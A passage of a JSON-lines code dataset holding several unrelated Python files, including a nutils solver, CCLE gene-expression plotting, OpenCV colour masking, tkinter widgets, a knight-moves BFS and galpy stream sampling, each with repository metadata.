:class:`nutils.function.Argument` in ``residual``.\n residual : Integral\n inertia : Integral\n timestep : float\n Initial time step, will scale up as residual decreases\n lhs0 : vector\n Coefficient vector, starting point of the iterative procedure.\n constrain : boolean or float vector\n Equal length to ``lhs0``, masks the free vector entries as ``False``\n (boolean) or NaN (float). In the remaining positions the values of\n ``lhs0`` are returned unchanged (boolean) or overruled by the values in\n `constrain` (float).\n arguments : :class:`collections.abc.Mapping`\n Defines the values for :class:`nutils.function.Argument` objects in\n `residual`. The ``target`` should not be present in ``arguments``.\n Optional.\n\n Yields\n ------\n vector, float\n Tuple of coefficient vector and residual norm\n '''\n\n assert target not in (arguments or {}), '`target` should not be defined in `arguments`'\n\n jacobian0 = residual.derivative(target)\n jacobiant = inertia.derivative(target)\n if residual0 is not None:\n residual += residual0\n\n if constrain is None:\n constrain = numpy.zeros(residual.shape, dtype=bool)\n else:\n assert numeric.isarray(constrain) and constrain.dtype in (bool,float) and constrain.shape == residual.shape, 'invalid constrain argument'\n if constrain.dtype == float:\n lhs0 = numpy.choose(numpy.isnan(constrain), [constrain, lhs0])\n constrain = ~numpy.isnan(constrain)\n\n argshape = residual._argshape(target)\n assert len(argshape) == 1\n lhs = lhs0.copy()\n fcache = cache.WrapperCache()\n res, jac = Integral.multieval(residual, jacobian0+jacobiant/timestep, fcache=fcache, arguments=collections.ChainMap(arguments or {}, {target: lhs}))\n resnorm = resnorm0 = numpy.linalg.norm(res[~constrain])\n while True:\n yield lhs, resnorm\n lhs -= jac.solve(res, constrain=constrain, **solveargs)\n thistimestep = timestep * (resnorm0/resnorm)\n log.info('timestep: {:.0e}'.format(thistimestep))\n res, jac = Integral.multieval(residual, jacobian0+jacobiant/thistimestep, fcache=fcache, arguments=collections.ChainMap(arguments or {}, {target: lhs}))\n resnorm = numpy.linalg.norm(res[~constrain])\n\n\ndef thetamethod(target, residual, inertia, timestep, lhs0, theta, target0='_thetamethod_target0', constrain=None, newtontol=1e-10, *, arguments=None, **newtonargs):\n '''solve time dependent problem using the theta method\n\n Parameters\n ----------\n target : :class:`str`\n Name of the target: a :class:`nutils.function.Argument` in ``residual``.\n residual : Integral\n inertia : Integral\n timestep : float\n Initial time step, will scale up as residual decreases\n lhs0 : vector\n Coefficient vector, starting point of the iterative procedure.\n theta : float\n Theta value (theta=1 for implicit Euler, theta=0.5 for Crank-Nicolson)\n residual0 : Integral\n Optional additional residual component evaluated in previous timestep\n constrain : boolean or float vector\n Equal length to ``lhs0``, masks the free vector entries as ``False``\n (boolean) or NaN (float). In the remaining positions the values of\n ``lhs0`` are returned unchanged (boolean) or overruled by the values in\n `constrain` (float).\n newtontol : float\n Residual tolerance of individual timesteps\n arguments : :class:`collections.abc.Mapping`\n Defines the values for :class:`nutils.function.Argument` objects in\n `residual`. The ``target`` should not be present in ``arguments``.\n Optional.\n\n Yields\n ------\n vector\n Coefficient vector for all timesteps after the initial condition.\n '''\n\n assert target != target0, '`target` should not be equal to `target0`'\n assert target not in (arguments or {}), '`target` should not be defined in `arguments`'\n assert target0 not in (arguments or {}), '`target0` should not be defined in `arguments`'\n lhs = lhs0\n res0 = residual * theta + inertia / timestep\n res1 = residual * (1-theta) - inertia / timestep\n res = res0 + res1.replace({target: function.Argument(target0, lhs.shape)})\n jac = res.derivative(target)\n while True:\n yield lhs\n lhs = newton(target, residual=res, jacobian=jac, lhs0=lhs, constrain=constrain, arguments=collections.ChainMap(arguments or {}, {target0: lhs}), **newtonargs).solve(tol=newtontol)\n\n\nimpliciteuler = functools.partial(thetamethod, theta=1)\ncranknicolson = functools.partial(thetamethod, theta=0.5)\n\n\n@log.title\ndef optimize(target, functional, droptol=None, lhs0=None, constrain=None, newtontol=None, *, arguments=None):\n '''find the minimizer of a given functional\n\n Parameters\n ----------\n target : :class:`str`\n Name of the target: a :class:`nutils.function.Argument` in ``residual``.\n functional : scalar Integral\n The functional the should be minimized by varying target\n droptol : :class:`float`\n Threshold for leaving entries in the return value at NaN if they do not\n contribute to the value of the functional.\n lhs0 : vector\n Coefficient vector, starting point of the iterative procedure (if\n applicable).\n constrain : boolean or float vector\n Equal length to ``lhs0``, masks the free vector entries as ``False``\n (boolean) or NaN (float). In the remaining positions the values of\n ``lhs0`` are returned unchanged (boolean) or overruled by the values in\n `constrain` (float).\n newtontol : float\n Residual tolerance of Newton procedure (if applicable)\n\n Yields\n ------\n vector\n Coefficient vector corresponding to the functional optimum\n '''\n\n assert target not in (arguments or {}), '`target` should not be defined in `arguments`'\n assert len(functional.shape) == 0, 'functional should be scalar'\n argshape = functional._argshape(target)\n if lhs0 is None:\n lhs0 = numpy.zeros(argshape)\n else:\n assert numeric.isarray(lhs0) and lhs0.dtype == float and lhs0.shape == argshape, 'invalid lhs0 argument'\n if constrain is None:\n constrain = numpy.zeros(argshape, dtype=bool)\n else:\n assert numeric.isarray(constrain) and constrain.dtype in (bool,float) and constrain.shape == argshape, 'invalid constrain argument'\n if constrain.dtype == float:\n lhs0 = numpy.choose(numpy.isnan(constrain), [constrain, lhs0])\n constrain = ~numpy.isnan(constrain)\n residual = functional.derivative(target)\n jacobian = residual.derivative(target)\n f0, res, jac = Integral.multieval(functional, residual, jacobian, arguments=collections.ChainMap(arguments or {}, {target: lhs0}))\n freezedofs = constrain if droptol is None else constrain | ~jac.rowsupp(droptol)\n log.info('optimizing for {}/{} degrees of freedom'.format(len(res)-freezedofs.sum(), len(res)))\n lhs = lhs0 - jac.solve(res, constrain=freezedofs) # residual(lhs0) + jacobian(lhs0) dlhs = 0\n if not jacobian.contains(target): # linear: functional(lhs0+dlhs) = functional(lhs0) + residual(lhs0) dlhs + .5 dlhs jacobian(lhs0) dlhs\n value = f0 + .5 * res.dot(lhs-lhs0)\n else: # nonlinear\n assert newtontol is not None, 'newton tolerance `newtontol` must be specified for nonlinear problems'\n lhs = newton(target, residual, lhs0=lhs, constrain=freezedofs, arguments=arguments).solve(newtontol)\n value = functional.eval(arguments=collections.ChainMap(arguments or {}, {target: lhs}))\n assert numpy.isfinite(lhs).all(), 'optimization failed (forgot droptol?)'\n log.info('optimum: {:.2e}'.format(value))\n lhs[freezedofs & ~constrain] = numpy.nan\n return lhs\n","sub_path":"nutils/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":21800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"243838302","text":"import os\nimport re\nimport math\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom cycler import cycler\n\nclass CancerCellLineEncyclopedia(object):\n \"\"\"https://portals.broadinstitute.org/ccle\n \"\"\"\n def __init__(self, gene_names, \n expression = 'https://data.broadinstitute.org/ccle/CCLE_RNAseq_rsem_genes_tpm_20180929.txt.gz', \n annotations = 'https://data.broadinstitute.org/ccle/Cell_lines_annotations_20181226.txt', \n counts = 'https://data.broadinstitute.org/ccle/CCLE_RNAseq_genes_counts_20180929.gct.gz', \n cell_lines=[], ccle_names=[]):\n \n self.gene_names = gene_names\n self.cell_lines = cell_lines\n self.ccle_names = ccle_names\n \n self.gene_expression_data = pd.read_table(expression,index_col=0)\n\n self.annotations = pd.read_table(annotations)\n\n self.counts = pd.read_table(counts,header=2, usecols=range(2))\n\n self.annotations_name = set(self.annotations.Name)\n self.annotations_ccle_id = set(self.annotations.CCLE_ID)\n self.counts_description = set(self.counts.Description)\n\n def _gene2id(self, gene):\n if gene not in self.counts_description:\n print(\"gene '{}' does not exist.\\n\".format(gene))\n return False\n else:\n gene_id = self.counts.at[\n list(self.counts.Description).index(gene), 'Name'\n ]\n return gene_id\n \n def _id2gene(self, gene_id):\n gene = self.counts.at[\n list(self.counts.Name).index(gene_id), 'Description'\n ]\n return gene\n\n def _cell2id(self, cell):\n if cell not in self.annotations_name:\n raise ValueError(cell)\n else:\n ccle_id = self.annotations.at[\n list(self.annotations.Name).index(cell), 'CCLE_ID'\n ]\n return ccle_id\n\n def _id2cell(self, ccle_id):\n if ccle_id not in self.annotations_ccle_id:\n raise ValueError(ccle_id)\n else:\n cell = self.annotations.at[\n list(self.annotations.CCLE_ID).index(ccle_id), 'Name'\n ]\n try:\n if math.isnan(float(cell)):\n cell = re.findall('(.*?)_', ccle_id)[0]\n except ValueError:\n pass\n return cell\n\n def _get_gene_id(self):\n gene_ids = []\n for gene in self.gene_names:\n a_gene_id = self._gene2id(gene)\n if not a_gene_id:\n pass\n else:\n gene_ids.append(a_gene_id)\n return gene_ids\n \n def _get_ccle_id(self):\n ccle_ids = []\n for cell in self.cell_lines:\n ccle_ids.append(self._cell2id(cell))\n return ccle_ids\n\n def _extract(self):\n gene_ids = self._get_gene_id()\n ccle_ids = self._get_ccle_id() \\\n if len(self.ccle_names) < len(self.cell_lines) else self.ccle_names\n data = self.gene_expression_data.loc[gene_ids, ccle_ids]\n data.index.name = None\n data.rename(\n index=lambda x: self._id2gene(x),\n columns=lambda x: self._id2cell(x),\n inplace=True\n )\n data.to_csv('tpm_values.csv')\n return data\n\n def to_expression(self):\n if not self.cell_lines and not self.ccle_names:\n raise ValueError('cell_lines or ccle_names must be filled in.')\n os.makedirs('./expression', exist_ok=True)\n data = self._extract()\n # rcParams\n plt.rcParams['font.family'] = 'Arial'\n plt.rcParams['font.size'] = 28\n plt.rcParams['axes.linewidth'] = 2\n plt.rcParams['xtick.major.width'] = 2\n plt.rcParams['ytick.major.width'] = 2\n plt.rcParams['axes.prop_cycle'] = cycler(\n color=[\n '#4E79A7', '#F28E2B', '#E15759', '#76B7B2','#59A14E',\n '#EDC949','#B07AA2','#FF9DA7','#9C755F','#BAB0AC'\n ]\n )\n for gene in self.gene_names:\n if gene in self.counts_description:\n ax = data.loc[gene].plot.bar(\n figsize=(\n 2*max(len(self.cell_lines), len(self.ccle_names)), 6\n ), fontsize=28, title=gene, # r'$\\it{'+gene+'}$'\n )\n ax.set_ylabel('TPM')\n sns.despine()\n plt.savefig(\n './expression/{}.pdf'.format(gene), bbox_inches='tight'\n )\n plt.close()\n \n def to_gene_summary(self):\n with open('gene_summary.md', mode='w') as f:\n f.write('|gene_name|gene_id|GeneCards_URL|\\n'\\\n '|---------|-------|-------------|\\n')\n for gene in self.gene_names:\n if gene in self.counts_description:\n gene_id = self._gene2id(gene)\n gene_cards_url = (\n 'https://www.genecards.org/'\\\n 'cgi-bin/carddisp.pl?gene='+gene\n )\n f.write(\n '|'+gene+'|'+gene_id+'|'+gene_cards_url+'|\\n'\n )","sub_path":"ccle_processing.py","file_name":"ccle_processing.py","file_ext":"py","file_size_in_byte":5204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"620812408","text":"# find_blue_in_image.py\n# Detect pixels similar to a prescribed color.\n# This can be done usg HSV color space.\n\nimport cv2\nimport numpy as np \n\nimg = cv2.imread('input_image.jpg', 1) \n# 1 : import image in color\n\n# Convert to different color space\nimg_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\nprint(type(img_hsv))\nprint(img_hsv.shape)\nprint(img_hsv.dtype)\n\ngreen = np.uint8([[[0, 255, 0]]]) # 3D array\ngreen_hsv = cv2.cvtColor(green, cv2.COLOR_BGR2HSV)\nh = green_hsv[0,0,0]\nprint('Green in HSV color space:', green_hsv)\nprint('Hue = ', h) # see that h = 120\n\n# lower = np.array([90, 50, 22])\n# upper = np.array([180, 255, 90])\nlower = np.array([h-20, 50, 50])\nupper = np.array([h+20, 255, 255])\nprint('lower = ', lower)\nprint('upper = ', upper)\n\n# quit()\n\n# Determine binary mask\ngreen_mask = cv2.inRange(img_hsv, lower, upper)\n\n# Apply mask to color image\noutput = cv2.bitwise_and(img, img, mask = green_mask)\n\n# Show images:\ncv2.imshow('Original image', img)\ncv2.imshow('Mask', green_mask)\ncv2.imshow('Segmented image', output)\n\nprint('Switch to images. Then press any key to stop')\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n# Write the image to a file\n# cv2.imwrite('tiger_mask.jpg', green_mask) \n# cv2.imwrite('tiger_green.jpg', output) \ncv2.imwrite('mask_image.jpg', green_mask) \ncv2.imwrite('detected_pixels.jpg', output) \n\n\n# Reference\n# http://docs.opencv.org/3.2.0/df/d9d/tutorial_py_colorspaces.html\n","sub_path":"Module 8/demo22ex3.py","file_name":"demo22ex3.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"369369863","text":"import tkinter as tk\nfrom tkinter import messagebox\nfrom robot import create_block_hola, create_block_medio, create_block_chau, printer\n\n\n\nclass Mainframe(tk.Frame):\n # Mainframe contains the widgets\n # More advanced programs may have multiple frames\n # or possibly a grid of subframes\n \n def __init__(self,master,*args,**kwargs):\n # *args packs positional arguments into tuple args\n # **kwargs packs keyword arguments into dict kwargs\n \n # initialise base class\n tk.Frame.__init__(self,master,*args,**kwargs)\n # in this case the * an ** operators unpack the parameters\n \n # put your widgets here\n #self.counter_message = tk.IntVar()\n tk.Label(self,textvariable = \"Prueba calyx ejecutable v1\").grid(row = 0,column = 0)\n tk.Button(self,text =\"Mensaje\",command = self.do_mensaje).grid(row = 1,column = 0)\n\n def do_mensaje(self):\n messagebox.showinfo(message=\"Hola mundo\", title=\"Calyx prueba\")\n \nclass App(tk.Tk):\n def __init__(self):\n tk.Tk.__init__(self)\n \n # set the title bar text\n self.title('Calyx prueba')\n # Make sure app window is big enough to show title \n self.geometry('300x100')\n \n # create and pack a Mainframe window\n Mainframe(self).pack()\n \n # now start\n self.mainloop()\n \n# create an App object\n# it will run itself\nApp()","sub_path":"qside/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"644830906","text":"import sys\nreadl = sys.stdin.readline\n\ndx = [-2, -1, 1, 2, 2, 1, -1, -2]\ndy = [1, 2, 2, 1, -1, -2, -2, -1]\n\nt = int(readl())\nfor _ in range(t):\n l = int(readl())\n current = list(map(int, readl().split()))\n target = list(map(int, readl().split()))\n \n queue = [(current[0], current[1], 0)]\n index = 0\n \n visited = [[False for _ in range(l)] for _ in range(l)]\n visited[current[0]][current[1]] = True\n\n result = 0\n while index < len(queue):\n node = queue[index]\n index += 1\n\n if node[0] == target[0] and node[1] == target[1]:\n result = node[2]\n break\n \n for i in range(8):\n nx = node[0] + dx[i]\n ny = node[1] + dy[i]\n nc = node[2] + 1\n\n if not (0 <= nx < l and 0 <= ny < l):\n continue\n if visited[nx][ny]:\n continue\n\n visited[nx][ny] = True\n queue.append((nx, ny, nc))\n \n print(result)\n","sub_path":"Python/BOJ/BFS/7562.py","file_name":"7562.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"25359557","text":"import matplotlib\nmatplotlib.use('agg')\nimport numpy as np\nfrom galpy.potential import LogarithmicHaloPotential\nfrom galpy.orbit import Orbit\nfrom galpy.potential import MWPotential2014, turn_physical_off, MiyamotoNagaiPotential, plotDensities,evaluateDensities\nfrom galpy.util import bovy_conversion, save_pickles, bovy_coords, bovy_plot\nfrom galpy.df import streamdf,streamgapdf \nfrom galpy.util import bovy_coords, bovy_conversion\nfrom galpy import potential\nfrom matplotlib import cm, pyplot\nimport SCFbar_util\nfrom astropy import units\nimport astropy.units as u\nimport streamspraydf\nimport argparse\nfrom galpy.potential import DehnenBarPotential\nfrom galpy.potential import DehnenSmoothWrapperPotential as DehnenWrap\n\ndef galcencyl_to_lbd(R,phi,Z,degree=True):\n xyz=bovy_coords.galcencyl_to_XYZ(R,phi,Z)\n lbd=bovy_coords.XYZ_to_lbd(xyz[0],xyz[1],xyz[2],degree=degree)\n return lbd[0], lbd[1], lbd[2]\n\nparser = argparse.ArgumentParser(description='My app description')\nparser.add_argument('-o', '--output', help='Path to output file')\nargs = parser.parse_args()\n\n\nro=8.\nvo=220.\n\ndef galcencyl_to_lbd(R,phi,Z,degree=True):\n xyz=bovy_coords.galcencyl_to_XYZ(R,phi,Z)\n lbd=bovy_coords.XYZ_to_lbd(xyz[0],xyz[1],xyz[2],degree=degree)\n return lbd[0], lbd[1], lbd[2]\n \nMbar=10**10.\npat_speed=40.\nang=27.\n\nAc,As=SCFbar_util.compute_Acos_Asin()\nbarpot,nobarpot=SCFbar_util.Particle_Spray_MWPotentialSCFbar(mbar=Mbar,Acos=Ac,Asin=As,t_on=-2.)\n\np5= Orbit([229.018,-0.124,23.2,-2.296,-2.257,-58.7],radec=True,ro=ro,vo=vo,solarmotion=[-11.1,24.,7.25])\n\n#convert to galpy units\npal5=Orbit(p5._orb.vxvv)\n\n#mass of Pal 5 from Dehnen https://arxiv.org/pdf/astro-ph/0401422.pdf\nspdf= streamspraydf.streamspraydf(60000.*units.Msun,progenitor=pal5,pot=nobarpot,tdisrupt=5.*units.Gyr)\nspdft= streamspraydf.streamspraydf(60000.*units.Msun,progenitor=pal5,pot=nobarpot,leading=False,tdisrupt=5.*units.Gyr)\n\nN=1000\n\n#Rt,vRt,vTt,zt,vzt,phit\nRvRl,pdtl= spdf.sample(n=N,returndt=True,integrate=False)\nRvRt,pdtt= spdft.sample(n=N,returndt=True,integrate=False)\n\norb_t= np.empty((6,N))\norb_l= np.empty((6,N))\n\nfor ii in range(N):\n ot=Orbit(RvRt[:,ii])\n ot.integrate(np.linspace(-pdtt[ii],0.,1001),barpot)\n \n ol=Orbit(RvRl[:,ii])\n ol.integrate(np.linspace(-pdtl[ii],0.,1001),barpot)\n \n ot= ot(0.)\n ol=ol(0.)\n orb_t[:,ii]= [ot.R(),ot.vR(),ot.vT(),ot.z(),ot.vz(),ot.phi()]\n orb_l[:,ii]= [ol.R(),ol.vR(),ol.vT(),ol.z(),ol.vz(),ol.phi()]\n\nftrail=args.output\nflead=ftrail.replace('trailing','leading')\n\nfo_trail=open(ftrail,'w')\nfo_lead=open(flead,'w')\n\nfo_trail.write(\"#R phi z vR vT vz ts\" + \"\\n\")\nfo_lead.write(\"#R phi z vR vT vz ts\" + \"\\n\")\n\nfor jj in range(N):\n fo_trail.write(str(orb_t[0][jj]) + \" \" + str(orb_t[5][jj]) + \" \" + str(orb_t[3][jj]) + \" \" + str(orb_t[1][jj]) + \" \" + str(orb_t[2][jj]) + \" \" + str(orb_t[4][jj]) + \" \" + str(pdtt[jj]) + \"\\n\")\n fo_lead.write(str(orb_l[0][jj]) + \" \" + str(orb_l[5][jj]) + \" \" + str(orb_l[3][jj]) + \" \" + str(orb_l[1][jj]) + \" \" + str(orb_l[2][jj]) + \" \" + str(orb_l[4][jj]) + \" \" + str(pdtl[jj]) + \"\\n\")\n \nfo_trail.close()\nfo_lead.close()\n\n\n\n\n","sub_path":"run_on_cluster/sample_particle_spray_stream_test.py","file_name":"sample_particle_spray_stream_test.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"599476897","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# readsemcsv\n# utilisatires pour lire une semain dans les csv de mois\n\n# le fichier zip doit s'appeler BIDAAABBBmmyy\n\n# la fonction presentzip(paire,mois,year) dit si le zip est dispo\n# la fonction creenomzip(paire mois year) renvoie la liste des zip correspondant a la semaine\n\n\nimport zipfile\nimport datesemainutils\n\n# renvoie la liste des zip a utiliser pour pouvoir charger cette semaine\n# accompagnée de la date (jour, mois annee du premier jour alire dans ce fichier\n#le nom du zip est yyymmpaire\ndef creenomzip(paire, semaine, annee):\n listemois = datesemainutils.getlistemois(semaine,annee)\n listezips = []\n for mois in listemois:\n zipname = \"%04d%02d%s.zip\" % (mois[1],mois[2],paire)\n jourdumois = mois[0]\n listezips.append([jourdumois,mois[1],mois[2],zipname])\n return listezips\n\n# import zipfile\n\n# rep ou sont les donnees\ndatarep = \"c:\\\\tmp\"\n\n\n################## readlines ####################\n# : lecture de qq jous dans un fichier mois\n# lit nbjours dans un fichier csv contenant le mois pour une paire\n# a partir du jour du mois = jour\n# ligne par ligne\n# renvoie le nb de minutes entre la ligne et datedeb\n# yield la date et la valeur\n# renvoie le nb de jours lus quand le balayage est fini (None, nbjourslus)\n# charge dans le tableau le nombre de jourd nbjours a partir du jour jour\ndef readlines(datedeb, nbjours, jour, nomzip, paire):\n # on lit le zip sur le disque\n fh1 = open(nomzip, 'rb')\n z1 = zipfile.ZipFile(fh1) # classe lisant le zipdanzs le fichier ouvert\n nbjourslus = 0\n lstday = -1\n with z1.open(paire + \".csv\", mode='r') as read1:\n for laligne in read1:\n numsample, date, begin = datesemainutils.decodelinemois(laligne) # lecture de la ligne\n if (date.month != datedeb.month): # bug : parfois le 1 er jour du mois est ds le mois prec\n continue\n if lstday != date.day: # la date a changé\n if nbjourslus != 0: # on a commence a lire des jours\n nbjourslus = nbjourslus + 1 # un nouveau jour\n else:\n print(\"\\rjour\", date.day, ) # on n'a pas commence a lire des jours : on saute\n\n lstday = date.day\n\n if date.day == jour: # on a atteint le jour recherche\n nbjourslus = 1 # on commence\n\n if nbjourslus > nbjours: # on a lu le bon nombre de jours\n break # fin du for\n\n if nbjourslus != 0:\n delta = date - datedeb # delta depuis debut semaine\n yield nbjourslus, date, int(delta.total_seconds() / 60), begin # date, valeur debut\n\n fh1.close()\n\nimport os.path\n\n#genere un tableau contenant toutes les donnees pour cette paire et cette semaine\ndef generesemaine(paire,semaine, annee):\n ok=False\n listezip = creenomzip(paire, semaine, annee) #liste jour du mois, mois, annee, nomzip\n #regarde si les zip existent\n for nomfich in listezip:\n nomfich = datarep+\"\\\\\"+nomfich[3]\n print(nomfich)\n if os.path.isfile(nomfich):\n ok = True\n else:\n readwebfile(paire,nomfich[1],nomfich[2])\n\n\n\n\n\n\n######\n#pour test\nif __name__==\"__main__\":\n generesemaine(\"aaabbb\",1,2013)\n #laliste = creenomzip(\"aaabbb\",1,2013)\n #print (laliste)\n","sub_path":"readzipsemaine.py","file_name":"readzipsemaine.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"234600057","text":"import tkinter as tk\nfrom tkinter import ttk\n\nclass ScrollableFrame(ttk.Frame):\n \"\"\"class reprsenting a special tkinter object - scrollable frame\"\"\"\n\n def __init__(self, container, height=300, width=500, *args, **kwargs):\n \"\"\"initialize widgets scrollable frame contains from\"\"\"\n\n super().__init__(container, *args, **kwargs)\n\n # canvas containing a scrollbar and output frame\n canvas = tk.Canvas(self)\n canvas.config(height=height, width=width)\n\n # scrollbar\n scrollbar = ttk.Scrollbar(self, orient=\"vertical\", command=canvas.yview)\n\n # output frame\n self.scrollable_frame = ttk.Frame(canvas)\n\n # bind scrollbar to the frame\n self.scrollable_frame.bind(\n \"\",\n lambda e: canvas.configure(\n scrollregion=canvas.bbox(\"all\")\n )\n )\n\n canvas.create_window((0, 0), window=self.scrollable_frame, anchor=\"nw\")\n\n canvas.configure(yscrollcommand=scrollbar.set)\n\n canvas.pack(side=\"left\", fill=\"both\", expand=True)\n scrollbar.pack(side=\"right\", fill=\"y\")\n\n def destroy(self):\n super().destroy()\n self.scrollable_frame.destroy()\n","sub_path":"crm/scrollable_frame.py","file_name":"scrollable_frame.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"436929009","text":"\"\"\"Utility functions of the package music\n\"\"\"\n\nfrom enum import Enum\nfrom datetime import date, datetime\nfrom pathlib import Path\n\nfrom woodstock.settings import *\n\n\ndef format_date(a_date):\n \"\"\"Converts a date from datetime.date() to a string of the form ' , '.\n Uses strftime() method of datetime.date class and its pre-defined format codes from\n https://docs.python.org/3/library/datetime.html#strftime-and-strptime-format-codes\n \"\"\"\n\n return a_date.strftime('%b %d, %Y') if isinstance(a_date, date) or isinstance(a_date, datetime) else 'unknown'\n\n\ndef date_py_to_json(a_date):\n \"\"\"Converts datetime.date objects to JSON.\n \"\"\"\n\n\ndef date_json_to_py(iso_date):\n \"\"\"Converts string formatted as 'YYYY-mm-dd' to datetime.date object.\n \"\"\"\n\n\ndef get_project_dir():\n \"\"\"Returns the Path object corresponding to the project root directory.\n \"\"\"\n\n # return Path(PROJECT_DIR)\n return PROJECT_DIR\n\n\ndef get_data_dir():\n \"\"\"Returns the Path object corresponding to the data directory\n (by convention located right under the project root directory).\n \"\"\"\n\n data_dir = get_project_dir() / 'data'\n data_dir.mkdir(parents=True, exist_ok=True)\n return data_dir\n\n\nif __name__ == '__main__':\n\n\n print(PROJECT_DIR)\n # print()\n # print(get_project_dir())\n # # print(settings.DATA_DIR)\n # print()\n\n # pass\n\n # Demonstrate pathlib.Path\n # - user's home dir: Path.home()\n # - current dir: Path.cwd(), Path('.'), Path()\n # - absolute path: .absolute()\n # - parent dir: .parent\n # - new dir: = / '//.../'\n # .mkdir(parents=True, exist_ok=True)\n # - remove dir: .rmdir() # requires the to be empty\n # - project dir: settings.PROJECT_DIR\n print(Path.home())\n print(type(Path.home()))\n print(Path.cwd())\n print(Path('.'))\n print(Path('.').absolute())\n print(Path().absolute())\n print(Path().absolute().parent)\n # print(Path().absolute().parents)\n print(Path().absolute().parent.parent)\n # print(type(Path().absolute().parent.parent))\n new_dir = Path.cwd() / 'd1/d2'\n print(new_dir)\n new_dir.mkdir(parents=True, exist_ok=True)\n new_dir.rmdir() # this removes just d2\n new_dir = Path.cwd() / 'd1'\n new_dir.rmdir() # this removes d1\n\n # Demonstrate get_project_dir(), get_data_dir()\n print('get_project_dir():', get_project_dir())\n print('get_data_dir():', get_data_dir())\n","sub_path":"woodstock/util/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"106693588","text":"import cv2\nimport matplotlib.pyplot as plt\n\nimg2 = cv2.imread('Aula2-VisãoComputacional/img/secret.png')\nimg1 = cv2.imread('Aula2-VisãoComputacional/img/mining.jpg')\n\nimg1 = cv2.cvtColor(img1,cv2.COLOR_BGR2RGB)\nimg2 = cv2.cvtColor(img2,cv2.COLOR_BGR2RGB)\n\nimg_menor = cv2.resize(img2,(1900,1600))\n\nplt.imshow(img_menor)\nplt.show()\n\nimg_maior = img1\n\nx_offset = 500\ny_offset = 500\n\nx_end = x_offset + img_menor.shape[1]\ny_end = y_offset + img_menor.shape[0]\n\n# img_menor.shape\n# Y , X , COR\n\nimg_maior[y_offset:y_end,x_offset:x_end] = img_menor\nplt.imshow(img_maior)\nplt.show()\n","sub_path":"Computer Vision/Aula2-VisãoComputacional/06-Overlays.py","file_name":"06-Overlays.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"384198002","text":"from dataclasses import dataclass\nfrom pathlib import Path\n\nfrom scripts_ import tikz\n\ncond_samples_path = Path('data/thesis/polymnist/mofop/cond_gen_single_imgs')\ninput_samples_dir = cond_samples_path / 'input_samples'\n\n\n@dataclass\nclass Nodes:\n input_m1: str = f'\\\\includegraphics[width=2cm]{{{str(input_samples_dir / \"m2_0.png\")}}}'\n input_m0: str = f'\\\\includegraphics[width=2cm]{{{str(input_samples_dir / \"m1_0.png\")}}}'\n output__m1m2_m2: str = f'\\\\includegraphics[width=2cm]{{{str(cond_samples_path / \"m1_m2\" / \"m2_0.png\")}}}'\n output__m1m2_m1: str = f'\\\\includegraphics[width=2cm]{{{str(cond_samples_path / \"m1_m2\" / \"m1_0.png\")}}}'\n output__m2_m1: str = f'\\\\includegraphics[width=2cm]{{{str(cond_samples_path / \"m2\" / \"m1_0.png\")}}}'\n output__m1_m2: str = f'\\\\includegraphics[width=2cm]{{{str(cond_samples_path / \"m1\" / \"m2_0.png\")}}}'\n q1: str = r'$q_{\\phi_1}$'\n q2: str = r'$q_{\\phi_2}$'\n q1_tilde: str = r'$\\tilde{q}_{\\phi_1}$'\n q2_tilde: str = r'$\\tilde{q}_{\\phi_2}$'\n q12_tilde: str = r'$\\tilde{q}_{\\phi_{12}}$'\n zk1: str = '$z_{k,1}$'\n zk12: str = '$z_{k,12}$'\n zk2: str = '$z_{k,2}$'\n poe: str = r'\\textbf{PoE}'\n moe: str = r'\\textbf{MoE}'\n z: str = r'joint\\\\ posterior'\n points: str = r'\\ldots'\n\n\nnodes = Nodes()\npic = tikz.Picture(\n 'PoE/.style={rectangle, draw=red!60, fill=red!5, very thick, minimum size=10mm},'\n 'MoE/.style={rectangle, draw=red!60, fill=red!5, very thick, , minimum height=20mm, minimum width=10mm},'\n # 'lr/.style={ellipse, draw=blue!60, fill=blue!5, very thick, minimum size=15mm},'\n 'm0/.style={regular polygon,regular polygon sides=4, draw=green!60, fill=green!5, very thick, minimum size=28mm},'\n 'm0_dis/.style={circle, draw=green!60, fill=green!5, very thick, minimum size=10mm},'\n 'm1/.style={regular polygon,regular polygon sides=4, draw=orange!60, fill=orange!5, very thick, minimum size=28mm},'\n 'm1_distr/.style={circle, draw=orange!60, fill=orange!5, very thick, minimum size=10mm},'\n 'lr/.style={circle, draw=gray!60, fill=gray!5, very thick, minimum size=5mm},'\n 'subset/.style={circle, draw=gray!60, fill=gray!5, very thick, minimum size=5mm},'\n)\n\npic.set_node(text=nodes.input_m0, name='input_m0')\npic.set_node(text=nodes.q1, options='m0_dis, right of=input_m0, xshift=1.5cm', name='q1')\npic.set_node(text=nodes.input_m1, options='below of=input_m0, yshift=-2cm', name='input_m1')\npic.set_node(text=nodes.q2, options='m1_distr, right of=input_m1, xshift=1.5cm', name='q2')\n\npic.set_node(text=nodes.poe, 